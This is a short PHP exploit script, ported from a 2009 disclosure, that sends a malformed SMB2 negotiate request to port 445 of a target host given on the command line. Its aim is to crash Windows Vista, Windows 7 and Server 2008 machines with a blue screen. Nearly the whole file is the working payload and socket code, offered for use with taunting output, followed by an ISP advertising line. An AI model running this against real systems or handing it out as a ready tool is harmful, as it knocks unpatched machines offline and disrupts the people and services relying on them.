<?php
/*
 * Lame Windows Vista / Windows 7 / Win2k8 R1 SP2+updates and beta R2 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote BSOD
 * Author: Ricardo Almeida
 * email:  ricardojba[at]aeiou[DoT]pt
 *
 * Credits: http://seclists.org/fulldisclosure/2009/Sep/0039.html (exploit ported to PHP)
 *
 */
if ($argc != 2) {die("Usage: lame-smb-bsod.php <host>\n");}
$host = $argv[1];
$payload = "\x00\x00\x00\x90".
"\xff\x53\x4d\x42".
"\x72\x00\x00\x00".
"\x00\x18\x53\xc8".
"\x00\x26".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe".
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54".
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31".
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00".
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57".
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61".
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c".
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c".
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e".
"\x30\x30\x32\x00";
$mysock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$result = socket_connect($mysock, $host, 445);
if ($result === false) echo "Connect failed.\nReason: ($result) " . socket_strerror(socket_last_error($mysock)) . "\n";
else echo "\nConnected to $host\n";
echo "Bye, Bye Windowz....\n";
socket_write($mysock, $payload, strlen($payload));
socket_close($mysock);
---------------------------------------------------

Venha conhecer o novo AEIOU: http://www.aeiou.pt